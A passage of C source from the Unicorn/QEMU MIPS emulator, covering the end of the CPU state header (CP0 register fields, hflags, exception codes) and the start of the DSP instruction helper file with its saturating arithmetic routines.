CP0SC_PA_MASK) #define CP0SC_1GMASK (CP0SC_C_MASK | CP0SC_EU_MASK | CP0SC_AM_MASK | \ CP0SC_PA_1GMASK) #define CP0SC0_MASK (CP0SC_MASK | (CP0SC_MASK << 16)) #define CP0SC1_XAM 59 #define CP0SC1_XAM_MASK (0x7ULL << CP0SC1_XAM) #define CP0SC1_MASK (CP0SC_MASK | (CP0SC_MASK << 16) | CP0SC1_XAM_MASK) #define CP0SC2_XR 56 #define CP0SC2_XR_MASK (0xFFULL << CP0SC2_XR) #define CP0SC2_MASK (CP0SC_1GMASK | (CP0SC_1GMASK << 16) | CP0SC2_XR_MASK) target_ulong CP0_PWBase; target_ulong CP0_PWField; #if defined(TARGET_MIPS64) #define CP0PF_BDI 32 /* 37..32 */ #define CP0PF_GDI 24 /* 29..24 */ #define CP0PF_UDI 18 /* 23..18 */ #define CP0PF_MDI 12 /* 17..12 */ #define CP0PF_PTI 6 /* 11..6 */ #define CP0PF_PTEI 0 /* 5..0 */ #else #define CP0PF_GDW 24 /* 29..24 */ #define CP0PF_UDW 18 /* 23..18 */ #define CP0PF_MDW 12 /* 17..12 */ #define CP0PF_PTW 6 /* 11..6 */ #define CP0PF_PTEW 0 /* 5..0 */ #endif target_ulong CP0_PWSize; #if defined(TARGET_MIPS64) #define CP0PS_BDW 32 /* 37..32 */ #endif #define CP0PS_PS 30 #define CP0PS_GDW 24 /* 29..24 */ #define CP0PS_UDW 18 /* 23..18 */ #define CP0PS_MDW 12 /* 17..12 */ #define CP0PS_PTW 6 /* 11..6 */ #define CP0PS_PTEW 0 /* 5..0 */ /* * CP0 Register 6 */ int32_t CP0_Wired; int32_t CP0_PWCtl; #define CP0PC_PWEN 31 #if defined(TARGET_MIPS64) #define CP0PC_PWDIREXT 30 #define CP0PC_XK 28 #define 
CP0PC_XS 27 #define CP0PC_XU 26 #endif #define CP0PC_DPH 7 #define CP0PC_HUGEPG 6 #define CP0PC_PSN 0 /* 5..0 */ int32_t CP0_SRSConf0_rw_bitmask; int32_t CP0_SRSConf0; #define CP0SRSC0_M 31 #define CP0SRSC0_SRS3 20 #define CP0SRSC0_SRS2 10 #define CP0SRSC0_SRS1 0 int32_t CP0_SRSConf1_rw_bitmask; int32_t CP0_SRSConf1; #define CP0SRSC1_M 31 #define CP0SRSC1_SRS6 20 #define CP0SRSC1_SRS5 10 #define CP0SRSC1_SRS4 0 int32_t CP0_SRSConf2_rw_bitmask; int32_t CP0_SRSConf2; #define CP0SRSC2_M 31 #define CP0SRSC2_SRS9 20 #define CP0SRSC2_SRS8 10 #define CP0SRSC2_SRS7 0 int32_t CP0_SRSConf3_rw_bitmask; int32_t CP0_SRSConf3; #define CP0SRSC3_M 31 #define CP0SRSC3_SRS12 20 #define CP0SRSC3_SRS11 10 #define CP0SRSC3_SRS10 0 int32_t CP0_SRSConf4_rw_bitmask; int32_t CP0_SRSConf4; #define CP0SRSC4_SRS15 20 #define CP0SRSC4_SRS14 10 #define CP0SRSC4_SRS13 0 /* * CP0 Register 7 */ int32_t CP0_HWREna; /* * CP0 Register 8 */ target_ulong CP0_BadVAddr; uint32_t CP0_BadInstr; uint32_t CP0_BadInstrP; uint32_t CP0_BadInstrX; /* * CP0 Register 9 */ int32_t CP0_Count; uint32_t CP0_SAARI; #define CP0SAARI_TARGET 0 /* 5..0 */ uint64_t CP0_SAAR[2]; #define CP0SAAR_BASE 12 /* 43..12 */ #define CP0SAAR_SIZE 1 /* 5..1 */ #define CP0SAAR_EN 0 /* * CP0 Register 10 */ target_ulong CP0_EntryHi; #define CP0EnHi_EHINV 10 target_ulong CP0_EntryHi_ASID_mask; /* * CP0 Register 11 */ int32_t CP0_Compare; /* * CP0 Register 12 */ int32_t CP0_Status; #define CP0St_CU3 31 #define CP0St_CU2 30 #define CP0St_CU1 29 #define CP0St_CU0 28 #define CP0St_RP 27 #define CP0St_FR 26 #define CP0St_RE 25 #define CP0St_MX 24 #define CP0St_PX 23 #define CP0St_BEV 22 #define CP0St_TS 21 #define CP0St_SR 20 #define CP0St_NMI 19 #define CP0St_IM 8 #define CP0St_KX 7 #define CP0St_SX 6 #define CP0St_UX 5 #define CP0St_KSU 3 #define CP0St_ERL 2 #define CP0St_EXL 1 #define CP0St_IE 0 int32_t CP0_IntCtl; #define CP0IntCtl_IPTI 29 #define CP0IntCtl_IPPCI 26 #define CP0IntCtl_VS 5 int32_t CP0_SRSCtl; #define CP0SRSCtl_HSS 26 #define CP0SRSCtl_EICSS 18 #define CP0SRSCtl_ESS 12 #define CP0SRSCtl_PSS 6 #define CP0SRSCtl_CSS 0 int32_t CP0_SRSMap; #define CP0SRSMap_SSV7 28 #define CP0SRSMap_SSV6 24 #define CP0SRSMap_SSV5 20 #define CP0SRSMap_SSV4 16 #define CP0SRSMap_SSV3 12 #define CP0SRSMap_SSV2 8 #define CP0SRSMap_SSV1 4 #define CP0SRSMap_SSV0 0 /* * CP0 Register 13 */ int32_t CP0_Cause; #define CP0Ca_BD 31 #define CP0Ca_TI 30 #define CP0Ca_CE 28 #define CP0Ca_DC 27 #define CP0Ca_PCI 26 #define CP0Ca_IV 23 #define CP0Ca_WP 22 #define CP0Ca_IP 8 #define CP0Ca_IP_mask 0x0000FF00 #define CP0Ca_EC 2 /* * CP0 Register 14 */ target_ulong CP0_EPC; /* * CP0 Register 15 */ int32_t CP0_PRid; target_ulong CP0_EBase; target_ulong CP0_EBaseWG_rw_bitmask; #define CP0EBase_WG 11 target_ulong CP0_CMGCRBase; /* * CP0 Register 16 */ int32_t CP0_Config0; #define CP0C0_M 31 #define CP0C0_K23 28 /* 30..28 */ #define CP0C0_KU 25 /* 27..25 */ #define CP0C0_MDU 20 #define CP0C0_MM 18 #define CP0C0_BM 16 #define CP0C0_Impl 16 /* 24..16 */ #define CP0C0_BE 15 #define CP0C0_AT 13 /* 14..13 */ #define CP0C0_AR 10 /* 12..10 */ #define CP0C0_MT 7 /* 9..7 */ #define CP0C0_VI 3 #define CP0C0_K0 0 /* 2..0 */ int32_t CP0_Config1; #define CP0C1_M 31 #define CP0C1_MMU 25 /* 30..25 */ #define CP0C1_IS 22 /* 24..22 */ #define CP0C1_IL 19 /* 21..19 */ #define CP0C1_IA 16 /* 18..16 */ #define CP0C1_DS 13 /* 15..13 */ #define CP0C1_DL 10 /* 12..10 */ #define CP0C1_DA 7 /* 9..7 */ #define CP0C1_C2 6 #define CP0C1_MD 5 #define CP0C1_PC 4 #define CP0C1_WR 3 #define CP0C1_CA 2 #define CP0C1_EP 1 #define 
CP0C1_FP 0 int32_t CP0_Config2; #define CP0C2_M 31 #define CP0C2_TU 28 /* 30..28 */ #define CP0C2_TS 24 /* 27..24 */ #define CP0C2_TL 20 /* 23..20 */ #define CP0C2_TA 16 /* 19..16 */ #define CP0C2_SU 12 /* 15..12 */ #define CP0C2_SS 8 /* 11..8 */ #define CP0C2_SL 4 /* 7..4 */ #define CP0C2_SA 0 /* 3..0 */ int32_t CP0_Config3; #define CP0C3_M 31 #define CP0C3_BPG 30 #define CP0C3_CMGCR 29 #define CP0C3_MSAP 28 #define CP0C3_BP 27 #define CP0C3_BI 26 #define CP0C3_SC 25 #define CP0C3_PW 24 #define CP0C3_VZ 23 #define CP0C3_IPLV 21 /* 22..21 */ #define CP0C3_MMAR 18 /* 20..18 */ #define CP0C3_MCU 17 #define CP0C3_ISA_ON_EXC 16 #define CP0C3_ISA 14 /* 15..14 */ #define CP0C3_ULRI 13 #define CP0C3_RXI 12 #define CP0C3_DSP2P 11 #define CP0C3_DSPP 10 #define CP0C3_CTXTC 9 #define CP0C3_ITL 8 #define CP0C3_LPA 7 #define CP0C3_VEIC 6 #define CP0C3_VInt 5 #define CP0C3_SP 4 #define CP0C3_CDMM 3 #define CP0C3_MT 2 #define CP0C3_SM 1 #define CP0C3_TL 0 int32_t CP0_Config4; int32_t CP0_Config4_rw_bitmask; #define CP0C4_M 31 #define CP0C4_IE 29 /* 30..29 */ #define CP0C4_AE 28 #define CP0C4_VTLBSizeExt 24 /* 27..24 */ #define CP0C4_KScrExist 16 #define CP0C4_MMUExtDef 14 #define CP0C4_FTLBPageSize 8 /* 12..8 */ /* bit layout if MMUExtDef=1 */ #define CP0C4_MMUSizeExt 0 /* 7..0 */ /* bit layout if MMUExtDef=2 */ #define CP0C4_FTLBWays 4 /* 7..4 */ #define CP0C4_FTLBSets 0 /* 3..0 */ int32_t CP0_Config5; int32_t CP0_Config5_rw_bitmask; #define CP0C5_M 31 #define CP0C5_K 30 #define CP0C5_CV 29 #define CP0C5_EVA 28 #define CP0C5_MSAEn 27 #define CP0C5_PMJ 23 /* 25..23 */ #define CP0C5_WR2 22 #define CP0C5_NMS 21 #define CP0C5_ULS 20 #define CP0C5_XPA 19 #define CP0C5_CRCP 18 #define CP0C5_MI 17 #define CP0C5_GI 15 /* 16..15 */ #define CP0C5_CA2 14 #define CP0C5_XNP 13 #define CP0C5_DEC 11 #define CP0C5_L2C 10 #define CP0C5_UFE 9 #define CP0C5_FRE 8 #define CP0C5_VP 7 #define CP0C5_SBRI 6 #define CP0C5_MVH 5 #define CP0C5_LLB 4 #define CP0C5_MRP 3 #define CP0C5_UFR 2 #define CP0C5_NFExists 0 int32_t CP0_Config6; int32_t CP0_Config7; uint64_t CP0_LLAddr; uint64_t CP0_MAAR[MIPS_MAAR_MAX]; int32_t CP0_MAARI; /* XXX: Maybe make LLAddr per-TC? */ /* * CP0 Register 17 */ target_ulong lladdr; /* LL virtual address compared against SC */ target_ulong llval; uint64_t llval_wp; uint32_t llnewval_wp; uint64_t CP0_LLAddr_rw_bitmask; int CP0_LLAddr_shift; /* * CP0 Register 18 */ target_ulong CP0_WatchLo[8]; /* * CP0 Register 19 */ uint64_t CP0_WatchHi[8]; #define CP0WH_ASID 16 /* * CP0 Register 20 */ target_ulong CP0_XContext; int32_t CP0_Framemask; /* * CP0 Register 23 */ int32_t CP0_Debug; #define CP0DB_DBD 31 #define CP0DB_DM 30 #define CP0DB_LSNM 28 #define CP0DB_Doze 27 #define CP0DB_Halt 26 #define CP0DB_CNT 25 #define CP0DB_IBEP 24 #define CP0DB_DBEP 21 #define CP0DB_IEXI 20 #define CP0DB_VER 15 #define CP0DB_DEC 10 #define CP0DB_SSt 8 #define CP0DB_DINT 5 #define CP0DB_DIB 4 #define CP0DB_DDBS 3 #define CP0DB_DDBL 2 #define CP0DB_DBp 1 #define CP0DB_DSS 0 /* * CP0 Register 24 */ target_ulong CP0_DEPC; /* * CP0 Register 25 */ int32_t CP0_Performance0; /* * CP0 Register 26 */ int32_t CP0_ErrCtl; #define CP0EC_WST 29 #define CP0EC_SPR 28 #define CP0EC_ITC 26 /* * CP0 Register 28 */ uint64_t CP0_TagLo; int32_t CP0_DataLo; /* * CP0 Register 29 */ int32_t CP0_TagHi; int32_t CP0_DataHi; /* * CP0 Register 30 */ target_ulong CP0_ErrorEPC; /* * CP0 Register 31 */ int32_t CP0_DESAVE; target_ulong CP0_KScratch[MIPS_KSCRATCH_NUM]; /* We waste some space so we can handle shadow registers like TCs. 
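* Only active_tc holds the live register state of the running TC;
* tcs[current_tc] can be stale, which is why the MT helpers above always
* compare against current_tc before choosing which copy to access.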
*/ TCState tcs[MIPS_SHADOW_SET_MAX]; CPUMIPSFPUContext fpus[MIPS_FPU_MAX]; /* QEMU */ int error_code; #define EXCP_TLB_NOMATCH 0x1 #define EXCP_INST_NOTAVAIL 0x2 /* No valid instruction word for BadInstr */ uint32_t hflags; /* CPU State */ /* TMASK defines different execution modes */ #define MIPS_HFLAG_TMASK 0x1F5807FF #define MIPS_HFLAG_MODE 0x00007 /* execution modes */ /* * The KSU flags must be the lowest bits in hflags. The flag order * must be the same as defined for CP0 Status. This allows us to use * the bits as the value of mmu_idx. */ #define MIPS_HFLAG_KSU 0x00003 /* kernel/supervisor/user mode mask */ #define MIPS_HFLAG_UM 0x00002 /* user mode flag */ #define MIPS_HFLAG_SM 0x00001 /* supervisor mode flag */ #define MIPS_HFLAG_KM 0x00000 /* kernel mode flag */ #define MIPS_HFLAG_DM 0x00004 /* Debug mode */ #define MIPS_HFLAG_64 0x00008 /* 64-bit instructions enabled */ #define MIPS_HFLAG_CP0 0x00010 /* CP0 enabled */ #define MIPS_HFLAG_FPU 0x00020 /* FPU enabled */ #define MIPS_HFLAG_F64 0x00040 /* 64-bit FPU enabled */ /* * True if the MIPS IV COP1X instructions can be used. This also * controls the non-COP1X instructions RECIP.S, RECIP.D, RSQRT.S * and RSQRT.D. */ #define MIPS_HFLAG_COP1X 0x00080 /* COP1X instructions enabled */ #define MIPS_HFLAG_RE 0x00100 /* Reversed endianness */ #define MIPS_HFLAG_AWRAP 0x00200 /* 32-bit compatibility address wrapping */ #define MIPS_HFLAG_M16 0x00400 /* MIPS16 mode flag */ #define MIPS_HFLAG_M16_SHIFT 10 /* * If translation is interrupted between the branch instruction and * the delay slot, record what type of branch it is so that we can * resume translation properly. It might be possible to reduce * this from three bits to two. */ #define MIPS_HFLAG_BMASK_BASE 0x803800 #define MIPS_HFLAG_B 0x00800 /* Unconditional branch */ #define MIPS_HFLAG_BC 0x01000 /* Conditional branch */ #define MIPS_HFLAG_BL 0x01800 /* Likely branch */ #define MIPS_HFLAG_BR 0x02000 /* branch to register (can't link TB) */ /* Extra flags about the current pending branch. */ #define MIPS_HFLAG_BMASK_EXT 0x7C000 #define MIPS_HFLAG_B16 0x04000 /* branch instruction was 16 bits */ #define MIPS_HFLAG_BDS16 0x08000 /* branch requires 16-bit delay slot */ #define MIPS_HFLAG_BDS32 0x10000 /* branch requires 32-bit delay slot */ #define MIPS_HFLAG_BDS_STRICT 0x20000 /* Strict delay slot size */ #define MIPS_HFLAG_BX 0x40000 /* branch exchanges execution mode */ #define MIPS_HFLAG_BMASK (MIPS_HFLAG_BMASK_BASE | MIPS_HFLAG_BMASK_EXT) /* MIPS DSP resources access. */ #define MIPS_HFLAG_DSP 0x080000 /* Enable access to DSP resources. */ #define MIPS_HFLAG_DSP_R2 0x100000 /* Enable access to DSP R2 resources. */ #define MIPS_HFLAG_DSP_R3 0x20000000 /* Enable access to DSP R3 resources. */ /* Extra flag about HWREna register. */ #define MIPS_HFLAG_HWRENA_ULR 0x200000 /* ULR bit from HWREna is set. */ #define MIPS_HFLAG_SBRI 0x400000 /* R6 SDBBP causes RI excpt. in user mode */ #define MIPS_HFLAG_FBNSLOT 0x800000 /* Forbidden slot */ #define MIPS_HFLAG_MSA 0x1000000 #define MIPS_HFLAG_FRE 0x2000000 /* FRE enabled */ #define MIPS_HFLAG_ELPA 0x4000000 #define MIPS_HFLAG_ITC_CACHE 0x8000000 /* CACHE instr.
operates on ITC tag */ #define MIPS_HFLAG_ERL 0x10000000 /* error level flag */ target_ulong btarget; /* Jump / branch target */ target_ulong bcond; /* Branch condition (if needed) */ int SYNCI_Step; /* Address step size for SYNCI */ int CCRes; /* Cycle count resolution/divisor */ uint32_t CP0_Status_rw_bitmask; /* Read/write bits in CP0_Status */ uint32_t CP0_TCStatus_rw_bitmask; /* Read/write bits in CP0_TCStatus */ uint64_t insn_flags; /* Supported instruction set */ int saarp; /* Fields up to this point are cleared by a CPU reset */ #ifdef _MSC_VER int end_reset_fields; #else struct {} end_reset_fields; #endif /* Fields from here on are preserved across CPU reset. */ CPUMIPSMVPContext *mvp; CPUMIPSTLBContext *tlb; const mips_def_t *cpu_model; void *irq[8]; QEMUTimer *timer; /* Internal timer */ struct MIPSITUState *itu; MemoryRegion *itc_tag; /* ITC Configuration Tags */ target_ulong exception_base; /* ExceptionBase input to the core */ // Unicorn engine struct uc_struct *uc; }; /** * MIPSCPU: * @env: #CPUMIPSState * * A MIPS CPU. */ struct MIPSCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUMIPSState env; struct MIPSCPUClass cc; }; #define cpu_signal_handler cpu_mips_signal_handler extern void cpu_wrdsp(uint32_t rs, uint32_t mask_num, CPUMIPSState *env); extern uint32_t cpu_rddsp(uint32_t mask_num, CPUMIPSState *env); /* * MMU modes definitions. We carefully match the indices with our * hflags layout. */ #define MMU_USER_IDX 2 static inline int hflags_mmu_index(uint32_t hflags) { if (hflags & MIPS_HFLAG_ERL) { return 3; /* ERL */ } else { return hflags & MIPS_HFLAG_KSU; } } static inline int cpu_mmu_index(CPUMIPSState *env, bool ifetch) { return hflags_mmu_index(env->hflags); } typedef CPUMIPSState CPUArchState; typedef MIPSCPU ArchCPU; #include "exec/cpu-all.h" /* * Memory access type : * may be needed for precise access rights control and precise exceptions. */ enum { /* 1 bit to define user level / supervisor access */ ACCESS_USER = 0x00, ACCESS_SUPER = 0x01, /* 1 bit to indicate direction */ ACCESS_STORE = 0x02, /* Type of instruction that generated the access */ ACCESS_CODE = 0x10, /* Code fetch access */ ACCESS_INT = 0x20, /* Integer load/store access */ ACCESS_FLOAT = 0x30, /* floating point load/store access */ }; /* Exceptions */ enum { EXCP_NONE = -1, EXCP_RESET = 0, EXCP_SRESET, EXCP_DSS, EXCP_DINT, EXCP_DDBL, EXCP_DDBS, EXCP_NMI, EXCP_MCHECK, EXCP_EXT_INTERRUPT, /* 8 */ EXCP_DFWATCH, EXCP_DIB, EXCP_IWATCH, EXCP_AdEL, EXCP_AdES, EXCP_TLBF, EXCP_IBE, EXCP_DBp, /* 16 */ EXCP_SYSCALL, EXCP_BREAK, EXCP_CpU, EXCP_RI, EXCP_OVERFLOW, EXCP_TRAP, EXCP_FPE, EXCP_DWATCH, /* 24 */ EXCP_LTLBL, EXCP_TLBL, EXCP_TLBS, EXCP_DBE, EXCP_THREAD, EXCP_MDMX, EXCP_C2E, EXCP_CACHE, /* 32 */ EXCP_DSPDIS, EXCP_MSADIS, EXCP_MSAFPE, EXCP_TLBXI, EXCP_TLBRI, EXCP_LAST = EXCP_TLBRI, }; /* * This is an internally generated WAKE request line. * It is driven by the CPU itself. Raised when the MT * block wants to wake a VPE from an inactive state and * cleared when VPE goes from active to inactive. 
*/ #define CPU_INTERRUPT_WAKE CPU_INTERRUPT_TGT_INT_0 int cpu_mips_signal_handler(int host_signum, void *pinfo, void *puc); #define MIPS_CPU_TYPE_SUFFIX "-" TYPE_MIPS_CPU #define MIPS_CPU_TYPE_NAME(model) model MIPS_CPU_TYPE_SUFFIX #define CPU_RESOLVING_TYPE TYPE_MIPS_CPU bool cpu_supports_cps_smp(const char *cpu_type); bool cpu_supports_isa(const char *cpu_type, uint64_t isa); void cpu_set_exception_base(int vp_index, target_ulong address); /* mips_int.c */ void cpu_mips_soft_irq(CPUMIPSState *env, int irq, int level); /* mips_itu.c */ void itc_reconfigure(struct MIPSITUState *tag); /* helper.c */ target_ulong exception_resume_pc(CPUMIPSState *env); static inline void cpu_get_tb_cpu_state(CPUMIPSState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *pc = env->active_tc.PC; *cs_base = 0; *flags = env->hflags & (MIPS_HFLAG_TMASK | MIPS_HFLAG_BMASK | MIPS_HFLAG_HWRENA_ULR); } #endif /* MIPS_CPU_H */ unicorn-2.1.1/qemu/target/mips/dsp_helper.c000066400000000000000000004163021467524106700207100ustar00rootroot00000000000000/* * MIPS ASE DSP Instruction emulation helpers for QEMU. * * Copyright (c) 2012 Jia Liu <proljc@gmail.com> * Dongxue Zhang <elta.era@gmail.com> * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "qemu/bitops.h" /* * As the byte ordering doesn't matter, i.e. all columns are treated * identically, these unions can be used directly. */ typedef union { uint8_t ub[4]; int8_t sb[4]; uint16_t uh[2]; int16_t sh[2]; uint32_t uw[1]; int32_t sw[1]; } DSP32Value; typedef union { uint8_t ub[8]; int8_t sb[8]; uint16_t uh[4]; int16_t sh[4]; uint32_t uw[2]; int32_t sw[2]; uint64_t ul[1]; int64_t sl[1]; } DSP64Value; /*** MIPS DSP internal functions begin ***/ #define MIPSDSP_ABS(x) (((x) >= 0) ?
(x) : -(x)) #define MIPSDSP_OVERFLOW_ADD(a, b, c, d) (~((a) ^ (b)) & ((a) ^ (c)) & (d)) #define MIPSDSP_OVERFLOW_SUB(a, b, c, d) (((a) ^ (b)) & ((a) ^ (c)) & (d)) static inline void set_DSPControl_overflow_flag(uint32_t flag, int position, CPUMIPSState *env) { env->active_tc.DSPControl |= (target_ulong)flag << position; } static inline void set_DSPControl_carryflag(bool flag, CPUMIPSState *env) { env->active_tc.DSPControl &= ~(1 << 13); env->active_tc.DSPControl |= flag << 13; } static inline uint32_t get_DSPControl_carryflag(CPUMIPSState *env) { return (env->active_tc.DSPControl >> 13) & 0x01; } static inline void set_DSPControl_24(uint32_t flag, int len, CPUMIPSState *env) { uint32_t filter; filter = ((0x01 << len) - 1) << 24; filter = ~filter; env->active_tc.DSPControl &= filter; env->active_tc.DSPControl |= (target_ulong)flag << 24; } static inline void set_DSPControl_pos(uint32_t pos, CPUMIPSState *env) { target_ulong dspc; dspc = env->active_tc.DSPControl; #ifndef TARGET_MIPS64 dspc = dspc & 0xFFFFFFC0; dspc |= (pos & 0x3F); #else dspc = dspc & 0xFFFFFF80; dspc |= (pos & 0x7F); #endif env->active_tc.DSPControl = dspc; } static inline uint32_t get_DSPControl_pos(CPUMIPSState *env) { target_ulong dspc; uint32_t pos; dspc = env->active_tc.DSPControl; #ifndef TARGET_MIPS64 pos = dspc & 0x3F; #else pos = dspc & 0x7F; #endif return pos; } static inline void set_DSPControl_efi(uint32_t flag, CPUMIPSState *env) { env->active_tc.DSPControl &= 0xFFFFBFFF; env->active_tc.DSPControl |= (target_ulong)flag << 14; } #define DO_MIPS_SAT_ABS(size) \ static inline int##size##_t mipsdsp_sat_abs##size(int##size##_t a, \ CPUMIPSState *env) \ { \ if (a == INT##size##_MIN) { \ set_DSPControl_overflow_flag(1, 20, env); \ return INT##size##_MAX; \ } else { \ return MIPSDSP_ABS(a); \ } \ } DO_MIPS_SAT_ABS(8) DO_MIPS_SAT_ABS(16) DO_MIPS_SAT_ABS(32) #undef DO_MIPS_SAT_ABS /* get sum value */ static inline int16_t mipsdsp_add_i16(int16_t a, int16_t b, CPUMIPSState *env) { int16_t tempI; tempI = a + b; if (MIPSDSP_OVERFLOW_ADD(a, b, tempI, 0x8000)) { set_DSPControl_overflow_flag(1, 20, env); } return tempI; } static inline int16_t mipsdsp_sat_add_i16(int16_t a, int16_t b, CPUMIPSState *env) { int16_t tempS; tempS = a + b; if (MIPSDSP_OVERFLOW_ADD(a, b, tempS, 0x8000)) { if (a > 0) { tempS = 0x7FFF; } else { tempS = 0x8000; } set_DSPControl_overflow_flag(1, 20, env); } return tempS; } static inline int32_t mipsdsp_sat_add_i32(int32_t a, int32_t b, CPUMIPSState *env) { int32_t tempI; tempI = a + b; if (MIPSDSP_OVERFLOW_ADD(a, b, tempI, 0x80000000)) { if (a > 0) { tempI = 0x7FFFFFFF; } else { tempI = 0x80000000; } set_DSPControl_overflow_flag(1, 20, env); } return tempI; } static inline uint8_t mipsdsp_add_u8(uint8_t a, uint8_t b, CPUMIPSState *env) { uint16_t temp; temp = (uint16_t)a + (uint16_t)b; if (temp & 0x0100) { set_DSPControl_overflow_flag(1, 20, env); } return temp & 0xFF; } static inline uint16_t mipsdsp_add_u16(uint16_t a, uint16_t b, CPUMIPSState *env) { uint32_t temp; temp = (uint32_t)a + (uint32_t)b; if (temp & 0x00010000) { set_DSPControl_overflow_flag(1, 20, env); } return temp & 0xFFFF; } static inline uint8_t mipsdsp_sat_add_u8(uint8_t a, uint8_t b, CPUMIPSState *env) { uint8_t result; uint16_t temp; temp = (uint16_t)a + (uint16_t)b; result = temp & 0xFF; if (0x0100 & temp) { result = 0xFF; set_DSPControl_overflow_flag(1, 20, env); } return result; } static inline uint16_t mipsdsp_sat_add_u16(uint16_t a, uint16_t b, CPUMIPSState *env) { uint16_t result; uint32_t temp; temp = (uint32_t)a + 
(uint32_t)b; result = temp & 0xFFFF; if (0x00010000 & temp) { result = 0xFFFF; set_DSPControl_overflow_flag(1, 20, env); } return result; } static inline int32_t mipsdsp_sat32_acc_q31(int32_t acc, int32_t a, CPUMIPSState *env) { int64_t temp; int32_t temp32, temp31, result; int64_t temp_sum; #ifndef TARGET_MIPS64 temp = ((uint64_t)env->active_tc.HI[acc] << 32) | (uint64_t)env->active_tc.LO[acc]; #else temp = (uint64_t)env->active_tc.LO[acc]; #endif temp_sum = (int64_t)a + temp; temp32 = (temp_sum >> 32) & 0x01; temp31 = (temp_sum >> 31) & 0x01; result = temp_sum & 0xFFFFFFFF; if (temp32 != temp31) { if (temp32 == 0) { result = 0x7FFFFFFF; } else { result = 0x80000000; } set_DSPControl_overflow_flag(1, 16 + acc, env); } return result; } #ifdef TARGET_MIPS64 /* a[0] is LO, a[1] is HI. */ static inline void mipsdsp_sat64_acc_add_q63(int64_t *ret, int32_t ac, int64_t *a, CPUMIPSState *env) { bool temp64; ret[0] = env->active_tc.LO[ac] + a[0]; ret[1] = env->active_tc.HI[ac] + a[1]; if (((uint64_t)ret[0] < (uint64_t)env->active_tc.LO[ac]) && ((uint64_t)ret[0] < (uint64_t)a[0])) { ret[1] += 1; } temp64 = ret[1] & 1; if (temp64 != ((ret[0] >> 63) & 0x01)) { if (temp64) { ret[0] = (0x01ull << 63); ret[1] = ~0ull; } else { ret[0] = (0x01ull << 63) - 1; ret[1] = 0x00; } set_DSPControl_overflow_flag(1, 16 + ac, env); } } static inline void mipsdsp_sat64_acc_sub_q63(int64_t *ret, int32_t ac, int64_t *a, CPUMIPSState *env) { bool temp64; ret[0] = env->active_tc.LO[ac] - a[0]; ret[1] = env->active_tc.HI[ac] - a[1]; if ((uint64_t)ret[0] > (uint64_t)env->active_tc.LO[ac]) { ret[1] -= 1; } temp64 = ret[1] & 1; if (temp64 != ((ret[0] >> 63) & 0x01)) { if (temp64) { ret[0] = (0x01ull << 63); ret[1] = ~0ull; } else { ret[0] = (0x01ull << 63) - 1; ret[1] = 0x00; } set_DSPControl_overflow_flag(1, 16 + ac, env); } } #endif static inline int32_t mipsdsp_mul_i16_i16(int16_t a, int16_t b, CPUMIPSState *env) { int32_t temp; temp = (int32_t)a * (int32_t)b; if ((temp > (int)0x7FFF) || (temp < (int)0xFFFF8000)) { set_DSPControl_overflow_flag(1, 21, env); } temp &= 0x0000FFFF; return temp; } static inline int32_t mipsdsp_mul_u16_u16(int32_t a, int32_t b) { return a * b; } #ifdef TARGET_MIPS64 static inline int32_t mipsdsp_mul_i32_i32(int32_t a, int32_t b) { return a * b; } #endif static inline int32_t mipsdsp_sat16_mul_i16_i16(int16_t a, int16_t b, CPUMIPSState *env) { int32_t temp; temp = (int32_t)a * (int32_t)b; if (temp > (int)0x7FFF) { temp = 0x00007FFF; set_DSPControl_overflow_flag(1, 21, env); } else if (temp < (int)0xffff8000) { temp = 0xFFFF8000; set_DSPControl_overflow_flag(1, 21, env); } temp &= 0x0000FFFF; return temp; } static inline int32_t mipsdsp_mul_q15_q15_overflowflag21(uint16_t a, uint16_t b, CPUMIPSState *env) { int32_t temp; if ((a == 0x8000) && (b == 0x8000)) { temp = 0x7FFFFFFF; set_DSPControl_overflow_flag(1, 21, env); } else { temp = ((int16_t)a * (int16_t)b) << 1; } return temp; } /* right shift */ static inline uint8_t mipsdsp_rshift_u8(uint8_t a, target_ulong mov) { return a >> mov; } static inline uint16_t mipsdsp_rshift_u16(uint16_t a, target_ulong mov) { return a >> mov; } static inline int8_t mipsdsp_rashift8(int8_t a, target_ulong mov) { return a >> mov; } static inline int16_t mipsdsp_rashift16(int16_t a, target_ulong mov) { return a >> mov; } #ifdef TARGET_MIPS64 static inline int32_t mipsdsp_rashift32(int32_t a, target_ulong mov) { return a >> mov; } #endif static inline int16_t mipsdsp_rshift1_add_q16(int16_t a, int16_t b) { int32_t temp; temp = (int32_t)a + (int32_t)b; return (temp 
>> 1) & 0xFFFF; } /* round right shift */ static inline int16_t mipsdsp_rrshift1_add_q16(int16_t a, int16_t b) { int32_t temp; temp = (int32_t)a + (int32_t)b; temp += 1; return (temp >> 1) & 0xFFFF; } static inline int32_t mipsdsp_rshift1_add_q32(int32_t a, int32_t b) { int64_t temp; temp = (int64_t)a + (int64_t)b; return (temp >> 1) & 0xFFFFFFFF; } static inline int32_t mipsdsp_rrshift1_add_q32(int32_t a, int32_t b) { int64_t temp; temp = (int64_t)a + (int64_t)b; temp += 1; return (temp >> 1) & 0xFFFFFFFF; } static inline uint8_t mipsdsp_rshift1_add_u8(uint8_t a, uint8_t b) { uint16_t temp; temp = (uint16_t)a + (uint16_t)b; return (temp >> 1) & 0x00FF; } static inline uint8_t mipsdsp_rrshift1_add_u8(uint8_t a, uint8_t b) { uint16_t temp; temp = (uint16_t)a + (uint16_t)b + 1; return (temp >> 1) & 0x00FF; } #ifdef TARGET_MIPS64 static inline uint8_t mipsdsp_rshift1_sub_u8(uint8_t a, uint8_t b) { uint16_t temp; temp = (uint16_t)a - (uint16_t)b; return (temp >> 1) & 0x00FF; } static inline uint8_t mipsdsp_rrshift1_sub_u8(uint8_t a, uint8_t b) { uint16_t temp; temp = (uint16_t)a - (uint16_t)b + 1; return (temp >> 1) & 0x00FF; } #endif /* 128 bits long. p[0] is LO, p[1] is HI. */ static inline void mipsdsp_rndrashift_short_acc(int64_t *p, int32_t ac, int32_t shift, 